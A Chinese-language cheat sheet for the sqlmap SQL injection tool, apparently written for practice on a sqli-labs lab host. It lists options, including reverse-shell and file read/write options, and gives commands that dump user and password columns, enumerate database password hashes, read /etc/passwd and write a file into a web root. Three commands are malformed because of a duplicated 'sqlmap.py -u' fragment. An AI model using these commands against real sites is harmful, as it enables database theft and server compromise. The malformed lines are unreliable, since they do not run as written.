sqlmap工具使用
1.参数介绍
参数 | 说明 |
---|
-b | 获取banner |
-p | 指定测试参数 |
–proxy | 代理注入 |
–eval=EVALCODE | 使用HTTP参数污染 |
-a,all | 查询所有 |
–hostname | 主机名 |
–is-dba | 是否是管理员权限 |
–users | 枚举所有用户 |
–passwords | 枚举所有用户的密码 |
–roles | 枚举有所的用户角色 |
–schema | 枚举DBMS模式 |
–count | 枚举所有的条目数 |
–dump | 转存DBMS数据库表项目,需要定制字段名称 |
–search | 搜索列、表或数据库名称 |
–exclude-sysdbs | 枚举表时,排除系统数据库 |
–file-read=RFILE | 读取操作 |
–file-write=WFILE | 写入操作 |
–os-pwn | 反弹shell |
–check-waf | 启发式检查waf/ips/ids保护 |
–level | 测试等级(1~5) |
–tamper=TAMPER | 使用SQLMAP插件 |
–cookie=COOKIE | 指定HTTP Cookie,预登录 |
2.常用语法
# 判断是否存在注入点
sqlmap.py -u http://192.168.254.182/sqli-labs/Less-1/?id=1
# 判断文本中的请求是否存在注入 (文本内容为Web数据包)
sqlmap.py -r desktop/1.txt
# 查询当前用户下的所有数据库
sqlmap.py -u http://192.168.254.182/sqli-labs/Less-1/?id=1 --dbs
# 获取数据库中的表名
sqlmap.py -u "http://192.168.254.182/sqli-labs/Less-1/?id=1" -D pikachu --tables
# 获取表中的字段名
sqlmap.py -u "http://192.168.254.182/sqli-labs/Less-1/?id=1" -D pikachu -T users --columns
# 获取字段内容
sqlmap.py -u "http://192.168.254.182/sqli-labs/Less-1/?id=1" -D pikachu -T users -C username,password --dump
# 获取数据库的所有用户
sqlmap.py -u "sqlmap.py -u "http://192.168.254.182/sqli-labs/Less-1/?id=1" --users
# 获取数据库用户的密码
sqlmap.py -u "sqlmap.py -u "http://192.168.254.182/sqli-labs/Less-1/?id=1" --passwords
# 获取当前网站数据库的名称
sqlmap.py -u "sqlmap.py -u "http://192.168.254.182/sqli-labs/Less-1/?id=1" --current-db
# 从数据库服务器中读取文件
sqlmap.py -u "http://192.168.254.182/sqli-labs/Less-1/?id=1" --file-read "/etc/passwd" -v 1
# 上传文件到数据库服务器中(注意权限)
sqlmap.py -u http://192.168.254.182/sqli-labs/Less-1/?id=1 --file-write "C:\Users\wcs\Desktop\root.txt" --file-dest "/var/www/html"
# 使用tamper脚本
sqlmap.py -u https://192.168.254.182/sqli-labs/Less-1/?id=1 --tamper "模块名"